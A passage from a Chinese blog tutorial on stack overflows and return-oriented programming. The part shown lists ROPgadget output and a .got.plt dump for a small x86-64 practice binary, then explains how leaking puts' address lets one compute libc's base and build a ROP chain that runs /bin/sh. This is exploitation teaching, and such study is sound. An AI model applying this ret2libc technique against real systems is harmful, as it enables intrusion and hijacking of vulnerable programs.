class="line">============================================================</span><br><span class="line">0x00000000004004c2 : adc byte ptr [rax], ah ; jmp rax</span><br><span class="line">0x00000000004004c1 : adc byte ptr [rax], spl ; jmp rax</span><br><span class="line">0x00000000004004be : adc dword ptr [rbp - 0x41], ebx ; adc byte ptr [rax], spl ; jmp rax</span><br><span class="line">0x0000000000400457 : add al, byte ptr [rax] ; add byte ptr [rax], al ; jmp 0x400424</span><br><span class="line">0x00000000004005ff : add bl, dh ; ret</span><br><span class="line">0x00000000004005fd : add byte ptr [rax], al ; add bl, dh ; ret</span><br><span class="line">0x00000000004005fb : add byte ptr [rax], al ; add byte ptr [rax], al ; add bl, dh ; ret</span><br><span class="line">0x0000000000400437 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x400424</span><br><span class="line">0x000000000040058a : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret</span><br><span class="line">0x00000000004004cc : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret</span><br><span class="line">0x00000000004005fc : add byte ptr [rax], al ; add byte ptr [rax], al ; ret</span><br><span class="line">0x000000000040058b : add byte ptr [rax], al ; add cl, cl ; ret</span><br><span class="line">0x0000000000400413 : add byte ptr [rax], al ; add rsp, 8 ; ret</span><br><span class="line">0x0000000000400439 : add byte ptr [rax], al ; jmp 0x400422</span><br><span class="line">0x000000000040058c : add byte ptr [rax], al ; leave ; ret</span><br><span class="line">0x00000000004004ce : add byte ptr [rax], al ; pop rbp ; ret</span><br><span class="line">0x00000000004005fe : add byte ptr [rax], al ; ret</span><br><span class="line">0x0000000000400548 : add byte ptr [rbp + 5], dh ; jmp 0x4004e3</span><br><span class="line">0x0000000000400538 : add byte ptr [rcx], al ; ret</span><br><span class="line">0x000000000040058d : add cl, cl ; ret</span><br><span class="line">0x00000000004005e0 : add dword ptr [rax + 0x39], ecx ; jmp 0x40065d</span><br><span class="line">0x0000000000400447 : add dword ptr [rax], eax ; add byte ptr [rax], al ; jmp 0x400424</span><br><span class="line">0x0000000000400534 : add eax, 0x200b06 ; add ebx, esi ; ret</span><br><span class="line">0x0000000000400539 : add ebx, esi ; ret</span><br><span class="line">0x0000000000400416 : add esp, 8 ; ret</span><br><span class="line">0x0000000000400415 : add rsp, 8 ; ret</span><br><span class="line">0x0000000000400537 : and byte ptr [rax], al ; add ebx, esi ; ret</span><br><span class="line">0x0000000000400434 : and byte ptr [rax], al ; push 0 ; jmp 0x400427</span><br><span class="line">0x0000000000400444 : and byte ptr [rax], al ; push 1 ; jmp 0x400427</span><br><span class="line">0x0000000000400454 : and byte ptr [rax], al ; push 2 ; jmp 0x400427</span><br><span class="line">0x0000000000400565 : call qword ptr [rbp + 0x48]</span><br><span class="line">0x000000000040055e : call rax</span><br><span class="line">0x0000000000400546 : cmp dword ptr [rdi], 0 ; jne 0x400555 ; jmp 0x4004e5</span><br><span class="line">0x0000000000400545 : cmp qword ptr [rdi], 0 ; jne 0x400556 ; jmp 0x4004e6</span><br><span class="line">0x0000000000400442 : fimul dword ptr [rbx] ; and byte ptr [rax], al ; push 1 ; jmp 0x400429</span><br><span class="line">0x00000000004005dc : fmul qword ptr [rax - 0x7d] ; ret</span><br><span class="line">0x0000000000400559 : int1 ; push rbp ; mov rbp, rsp ; call rax</span><br><span class="line">0x00000000004004bd : je 0x4004d8 ; pop rbp ; mov edi, 0x601040 ; jmp rax</span><br><span class="line">0x000000000040050b : je 0x400520 ; pop rbp ; mov edi, 0x601040 ; jmp rax</span><br><span class="line">0x0000000000400558 : je 0x400551 ; push rbp ; mov rbp, rsp ; call rax</span><br><span class="line">0x0000000000400293 : jmp 0x40023b</span><br><span class="line">0x000000000040043b : jmp 0x400420</span><br><span class="line">0x000000000040054b : jmp 0x4004e0</span><br><span class="line">0x00000000004005e3 : jmp 0x40065a</span><br><span class="line">0x00000000004006eb : jmp qword ptr [rbp]</span><br><span class="line">0x00000000004004c5 : jmp rax</span><br><span class="line">0x0000000000400549 : jne 0x400552 ; jmp 0x4004e2</span><br><span class="line">0x000000000040058e : leave ; ret</span><br><span class="line">0x0000000000400432 : loop 0x400448 ; and byte ptr [rax], al ; push 0 ; jmp 0x400429</span><br><span class="line">0x0000000000400533 : mov byte ptr [rip + 0x200b06], 1 ; ret</span><br><span class="line">0x0000000000400589 : mov eax, 0 ; leave ; ret</span><br><span class="line">0x000000000040055c : mov ebp, esp ; call rax</span><br><span class="line">0x00000000004004c0 : mov edi, 0x601040 ; jmp rax</span><br><span class="line">0x000000000040055b : mov rbp, rsp ; call rax</span><br><span class="line">0x00000000004004c8 : nop dword ptr [rax + rax] ; pop rbp ; ret</span><br><span class="line">0x00000000004005f8 : nop dword ptr [rax + rax] ; ret</span><br><span class="line">0x0000000000400515 : nop dword ptr [rax] ; pop rbp ; ret</span><br><span class="line">0x000000000040050c : or ebx, dword ptr [rbp - 0x41] ; adc byte ptr [rax], spl ; jmp rax</span><br><span class="line">0x0000000000400536 : or esp, dword ptr [rax] ; add byte ptr [rcx], al ; ret</span><br><span class="line">0x00000000004005ec : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x00000000004005ee : pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x00000000004005f0 : pop r14 ; pop r15 ; ret</span><br><span class="line">0x00000000004005f2 : pop r15 ; ret</span><br><span class="line">0x0000000000400560 : pop rbp ; jmp 0x4004e1</span><br><span class="line">0x0000000000400532 : pop rbp ; mov byte ptr [rip + 0x200b06], 1 ; ret</span><br><span class="line">0x00000000004004bf : pop rbp ; mov edi, 0x601040 ; jmp rax</span><br><span class="line">0x00000000004005eb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x00000000004005ef : pop rbp ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x00000000004004d0 : pop rbp ; ret</span><br><span class="line">0x00000000004005f3 : pop rdi ; ret</span><br><span class="line">0x00000000004005f1 : pop rsi ; pop r15 ; ret</span><br><span class="line">0x00000000004005ed : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x0000000000400436 : push 0 ; jmp 0x400425</span><br><span class="line">0x0000000000400446 : push 1 ; jmp 0x400425</span><br><span class="line">0x0000000000400456 : push 2 ; jmp 0x400425</span><br><span class="line">0x000000000040055a : push rbp ; mov rbp, rsp ; call rax</span><br><span class="line">0x0000000000400419 : ret</span><br><span class="line">0x0000000000400452 : ror byte ptr [rbx], cl ; and byte ptr [rax], al ; push 2 ; jmp 0x400429</span><br><span class="line">0x000000000040050a : sal byte ptr [rbx + rcx + 0x5d], 0xbf ; adc byte ptr [rax], spl ; jmp rax</span><br><span class="line">0x00000000004004bc : sal byte ptr [rcx + rdx + 0x5d], 0xbf ; adc byte ptr [rax], spl ; jmp rax</span><br><span class="line">0x0000000000400557 : sal byte ptr [rcx + rsi*8 + 0x55], 0x48 ; mov ebp, esp ; call rax</span><br><span class="line">0x0000000000400605 : sub esp, 8 ; add rsp, 8 ; ret</span><br><span class="line">0x0000000000400604 : sub rsp, 8 ; add rsp, 8 ; ret</span><br><span class="line">0x00000000004004ca : <span class="built_in">test</span> byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret</span><br><span class="line">0x00000000004005fa : <span class="built_in">test</span> byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; ret</span><br><span class="line">0x0000000000400556 : <span class="built_in">test</span> eax, eax ; je 0x400553 ; push rbp ; mov rbp, rsp ; call rax</span><br><span class="line">0x0000000000400555 : <span class="built_in">test</span> rax, rax ; je 0x400554 ; push rbp ; mov rbp, rsp ; call rax</span><br><span class="line"></span><br><span class="line">Unique gadgets found: 87</span><br></pre></td></tr></table></figure>

<p>该程序中没有可以执行syscall这类可以执行系统调用的Gadget，但可以先想办法获取一些如libc等动态链接库的加载地址，再用libc中的gadget构造ROP。</p>
<p>用IDA打开，可以看到动态链接库libc的初始化加载函数<code>_libc_csu_init</code>，找到该函数末尾对应的gadget为<code>0x00000000004005f3 : pop rdi ; ret</code></p>
<p>ELF文件中通常存在.GOT.PLT和.PLT两个特殊的节，ELF编译时无法知道libc等动态链接库的加载地址，若想要调动动态链接库的函数，就必须使用.GOT.PLT和.PLT配合完成调用。</p>
<p>如果在程序段中有call _printf,其实并不是跳转到了实际的 _printf 函数位置，而是跳转到了PLT表中的 _printf 项，同时.PLT表作为一段代码，会从内存中取出 _printf 的实际地址进行跳转，而.GOT.PLT就是存放这一实际地址的地方</p>
<p>回到该ROP题，该程序的.GOT.PLT表如下所示</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">.got.plt:0000000000601000</span><br><span class="line">.got.plt:0000000000601000 ; Segment type: Pure data</span><br><span class="line">.got.plt:0000000000601000 ; Segment permissions: Read&#x2F;Write</span><br><span class="line">.got.plt:0000000000601000 _got_plt        segment qword public &#39;DATA&#39; use64</span><br><span class="line">.got.plt:0000000000601000                 assume cs:_got_plt</span><br><span class="line">.got.plt:0000000000601000                 ;org 601000h</span><br><span class="line">.got.plt:0000000000601000 _GLOBAL_OFFSET_TABLE_ dq offset _DYNAMIC</span><br><span class="line">.got.plt:0000000000601008 qword_601008    dq 0                    ; DATA XREF: sub_400420↑r</span><br><span class="line">.got.plt:0000000000601010 qword_601010    dq 0                    ; DATA XREF: sub_400420+6↑r</span><br><span class="line">.got.plt:0000000000601018 off_601018      dq offset puts          ; DATA XREF: _puts↑r</span><br><span class="line">.got.plt:0000000000601020 off_601020      dq offset __libc_start_main</span><br><span class="line">.got.plt:0000000000601020                                         ; DATA XREF: ___libc_start_main↑r</span><br><span class="line">.got.plt:0000000000601028 off_601028      dq offset gets          ; DATA XREF: _gets↑r</span><br><span class="line">.got.plt:0000000000601028 _got_plt        ends</span><br><span class="line">.got.plt:0000000000601028</span><br></pre></td></tr></table></figure>

<p>可以看到puts函数地址保存到0x601018位置，根据puts函数在libc库中的偏移地址，就能算出libc库的基地址，然后利用libc中的Gadget构造可以执行<code>/bin/sh</code>的ROP，从而获得shell。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/11/19/MIPS-%E5%85%A5%E9%97%A8/" rel="next" title="MIPS-入门">
                <i class="fa fa-chevron-left"></i> MIPS-入门
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/11/19/python-selenium%E7%88%AC%E5%8F%96%E6%BC%AB%E7%94%BB/" rel="prev" title="python-selenium爬取漫画">
                python-selenium爬取漫画 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7Carchive">
              
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">1.</span> <span class="nav-text">基础栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9E%84%E5%BB%BAc%E8%AF%AD%E8%A8%80%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6"><span class="nav-number">1.1.</span> <span class="nav-text">构建c语言可执行文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%86%E6%9E%90%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E7%BB%93%E6%9E%84"><span class="nav-number">1.2.</span> <span class="nav-text">分析可执行文件结构</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ROP"><span class="nav-number">2.</span> <span class="nav-text">ROP</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A4%BA%E4%BE%8B%E4%B8%80"><span class="nav-number">2.1.</span> <span class="nav-text">示例一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A4%BA%E4%BE%8B%E4%BA%8C"><span class="nav-number">2.2.</span> <span class="nav-text">示例二</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A4%BA%E4%BE%8B%E4%B8%89"><span class="nav-number">2.3.</span> <span class="nav-text">示例三</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "./public/search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
